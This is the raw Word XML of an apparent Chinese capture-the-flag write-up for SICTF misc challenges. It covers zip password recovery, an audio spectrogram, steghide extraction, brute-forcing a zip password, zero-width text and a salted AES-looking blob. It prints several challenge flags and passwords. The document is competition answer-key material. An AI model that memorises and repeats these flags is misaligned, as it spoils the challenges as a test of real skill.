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D422" w14:textId="77777777" w:rsidR="00EC72DD" w:rsidRPr="00EC72DD" w:rsidRDefault="00EC72DD" w:rsidP="00EC72DD">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="1D1E1E"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:eastAsia="宋体" w:hAnsi="IBM Plex Sans" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D5D7D7"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC72DD">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:eastAsia="宋体" w:hAnsi="IBM Plex Sans" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D5D7D7"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC72DD">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:eastAsia="宋体" w:hAnsi="IBM Plex Sans" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D5D7D7"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>签到</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC72DD">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:eastAsia="宋体" w:hAnsi="IBM Plex Sans" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D5D7D7"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC72DD">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:eastAsia="宋体" w:hAnsi="IBM Plex Sans" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D5D7D7"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>签到</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB2C9D7" w14:textId="517C4AAE" w:rsidR="00EC72DD" w:rsidRPr="00803C33" w:rsidRDefault="000149D6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00803C33">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>扫描，关注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E3DF8B" w14:textId="11879E52" w:rsidR="000149D6" w:rsidRDefault="000149D6">
      <w:r w:rsidRPr="000149D6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AD16657" wp14:editId="6E4FD412">
            <wp:extent cx="4934204" cy="1295467"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="350176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6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D595" w14:textId="4FF963B6" w:rsidR="00103465" w:rsidRPr="00803C33" w:rsidRDefault="00165A70">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165A70">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SICTF{1f4ce05a-0fed-42dc-9510-6e76dff8ff53}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692D93D7" w14:textId="77777777" w:rsidR="00103465" w:rsidRPr="00803C33" w:rsidRDefault="00103465">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57F8034F" w14:textId="278E9236" w:rsidR="00803C33" w:rsidRPr="00025CD3" w:rsidRDefault="00103465" w:rsidP="00803C33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 w:hint="eastAsia"/>
          <w:color w:val="D5D7D7"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00025CD3">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="D5D7D7"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>真</w:t>
      </w:r>
      <w:r w:rsidRPr="00025CD3">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:color w:val="D5D7D7"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>💨</w:t>
      </w:r>
      <w:r w:rsidRPr="00025CD3">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="D5D7D7"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>签到</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F1514F" w14:textId="4A16A318" w:rsidR="00562A7E" w:rsidRDefault="00562A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压后在压缩</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>包最后</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>有东西</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1F0BD8" w14:textId="21A04717" w:rsidR="00103465" w:rsidRDefault="004F2F82">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00562A7E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="788A3591" wp14:editId="7A3C0E57">
            <wp:extent cx="5274310" cy="1127760"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="785232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2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8B0" w14:textId="58F31007" w:rsidR="00904019" w:rsidRDefault="00904019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yberchef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>一波</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AA518E" w14:textId="790F75AA" w:rsidR="00A81C58" w:rsidRDefault="00533FCF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00533FCF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6121F963" wp14:editId="73877FC0">
            <wp:extent cx="5274310" cy="1598295"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="1105201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01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17BB" w14:textId="68E373E8" w:rsidR="007C14A0" w:rsidRDefault="007C14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身尝试了base家族</w:t>
      </w:r>
      <w:r w:rsidR="0011316B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，无果，然后就不会了，后面放了hint</w:t>
      </w:r>
      <w:r w:rsidR="00D42FBA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，文本加密字母</w:t>
      </w:r>
      <w:r w:rsidR="00A75F03">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，得到压缩包密码</w:t>
      </w:r>
      <w:r w:rsidR="00A75F03" w:rsidRPr="00A75F03">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2024HappyNewYear</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B66ADE" w14:textId="08C96D8A" w:rsidR="00190DE7" w:rsidRDefault="00190DE7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00190DE7">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="327BFE22" wp14:editId="3BB5648E">
            <wp:extent cx="5274310" cy="2190750"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="21056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159" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId9"/>
                    <a:srcRect b="20962"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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1A514" w14:textId="33A09641" w:rsidR="00AD507F" w:rsidRDefault="00AD507F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD507F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32B107F7" wp14:editId="4C8B6C17">
            <wp:extent cx="2559182" cy="977950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="783041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1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9EB7" w14:textId="3C7673E3" w:rsidR="00FE0B3C" w:rsidRDefault="00FE0B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开后有两个文件，</w:t>
      </w:r>
      <w:r w:rsidR="00B3049E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>图片</w:t>
      </w:r>
      <w:r w:rsidR="00712BB7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>名</w:t>
      </w:r>
      <w:r w:rsidR="00B3049E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>一看就是</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003F4FB6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>有隐写的</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003F4FB6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>东西</w:t>
      </w:r>
      <w:r w:rsidR="004C265F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>（什么</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004C265F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>steghide</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004C265F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00523D6E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>stegdetect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004C265F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="00A366B3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00E610F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>打开音频</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DDF2DF" w14:textId="57773853" w:rsidR="00331C08" w:rsidRDefault="00331C08">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00331C08">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13B8BD58" wp14:editId="6776C842">
            <wp:extent cx="5274310" cy="1125855"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2005050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0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A69" w14:textId="6E4D4207" w:rsidR="00EC2D68" w:rsidRDefault="00EC2D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换下频谱图</w:t>
      </w:r>
      <w:r w:rsidR="00631F8D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，刚开始属实</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00631F8D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>懵</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00631F8D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>逼了，（我还以为给什么东西</w:t>
      </w:r>
      <w:r w:rsidR="002B060F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>给软件，然后软件就可以提取什么东西出来，还以为是我没见过的方法</w:t>
      </w:r>
      <w:r w:rsidR="00631F8D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="00800B87">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00780B16">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>还音频文件名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627AF83D" w14:textId="51620B4F" w:rsidR="00780B16" w:rsidRDefault="00780B16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00780B16">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3958B742" wp14:editId="7152CB5E">
            <wp:extent cx="5274310" cy="2157730"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="178017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0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4C5" w14:textId="0177C6A4" w:rsidR="008D33CF" w:rsidRDefault="008D33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都傻了，后面还是找出题人，受到了启发</w:t>
      </w:r>
      <w:r w:rsidR="00CF3926">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>。文件名是提示要</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00971A1D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>lagrange</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CF3926">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>大写</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01946BF1" w14:textId="732516A1" w:rsidR="00CF3926" w:rsidRDefault="00CF3926">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF3926">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70E21DB7" wp14:editId="2D9ADFCE">
            <wp:extent cx="3892750" cy="3092609"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1439992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2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893" w14:textId="1B1B3CF8" w:rsidR="00E6402E" w:rsidRDefault="009637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把音频里的东西当密码丢给</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>steghide</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>工具</w:t>
      </w:r>
      <w:r w:rsidR="008A5E05">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>提取一下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1166B9AE" w14:textId="384D5CBC" w:rsidR="00AD507F" w:rsidRDefault="00C93ADA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C93ADA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AEB5FB5" wp14:editId="02C35A34">
            <wp:extent cx="4991357" cy="2025754"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="81831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7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1C8C" w14:textId="49BB91F0" w:rsidR="002F2EE1" w:rsidRDefault="002F2EE1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F2EE1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SICTF{T3e_endless_Lagrange_is_really_fun!}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB54BB7" w14:textId="77777777" w:rsidR="00E92043" w:rsidRDefault="00E92043">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="731334CF" w14:textId="77777777" w:rsidR="004E1496" w:rsidRPr="004E1496" w:rsidRDefault="004E1496" w:rsidP="004E1496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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004E1496">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="D5D7D7"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>WHO?WHO</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004E1496">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="D5D7D7"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>?WHO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0978C2A3" w14:textId="00DF0ADA" w:rsidR="00E92043" w:rsidRDefault="00055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遇事不决，爆破一手</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C51E98" w14:textId="454835B7" w:rsidR="00DB469D" w:rsidRDefault="00DB469D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB469D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E41770E" wp14:editId="2475A177">
            <wp:extent cx="5274310" cy="2686050"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="786180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0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B693" w14:textId="558528D6" w:rsidR="0045323B" w:rsidRDefault="004532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密码</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>qweqwe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6ED88E74" w14:textId="0A9715C7" w:rsidR="00F84417" w:rsidRDefault="00F84417">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F84417">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="612B2F89" wp14:editId="50CB761B">
            <wp:extent cx="4311872" cy="1625684"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="908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467" w14:textId="28EB0B24" w:rsidR="0069195E" w:rsidRDefault="00691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眼零宽</w:t>
      </w:r>
      <w:r w:rsidR="00566EF4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00706844">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>puzzlesolver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00706844">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>一把</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00706844">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>梭</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="73E30A5C" w14:textId="38343A95" w:rsidR="00566EF4" w:rsidRDefault="00566EF4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00566EF4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46B82E49" wp14:editId="21FA67E7">
            <wp:extent cx="5274310" cy="3742055"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="182014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43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64D1" w14:textId="77777777" w:rsidR="007B58F7" w:rsidRDefault="007B58F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DA71507" w14:textId="77777777" w:rsidR="00AA5F7B" w:rsidRPr="00AA5F7B" w:rsidRDefault="00AA5F7B" w:rsidP="00AA5F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5F7B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>U2FsdGVkX19uvldJ6CGUNff3B28QEdIjZqgUh98K+/0J16ELU8WVQydohw4P5+2M</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDE8235" w14:textId="77777777" w:rsidR="00AA5F7B" w:rsidRPr="00AA5F7B" w:rsidRDefault="00AA5F7B" w:rsidP="00AA5F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5F7B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>jbhTLQHNOpcoOd7kSRgy8pwpovCmimdD8M0IbYUeXjNKYePL/WP4PCMaOJHAW3HR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6390E3" w14:textId="5C363532" w:rsidR="00AA5F7B" w:rsidRDefault="00AA5F7B" w:rsidP="00AA5F7B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5F7B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>b7IEoDDH1NYh3o5NwMmcFEqy1ujf72VgQIQkaeYFFFE=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0333D9" w14:textId="7BAA24F8" w:rsidR="00606E66" w:rsidRDefault="005C7F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se</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>无果，解出salted</w:t>
      </w:r>
      <w:r w:rsidR="00E22AFC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，猜测</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E22AFC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>aes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E22AFC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>等对称加密</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D8C5CA" w14:textId="77777777" w:rsidR="00D10D0D" w:rsidRPr="00190DE7" w:rsidRDefault="004D7C3C" w:rsidP="00D10D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下来的对称加密</w:t>
      </w:r>
      <w:r w:rsidR="0019392D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>秘</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0019392D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>钥</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>有点脑洞</w:t>
      </w:r>
      <w:r w:rsidR="007409E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00341292">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
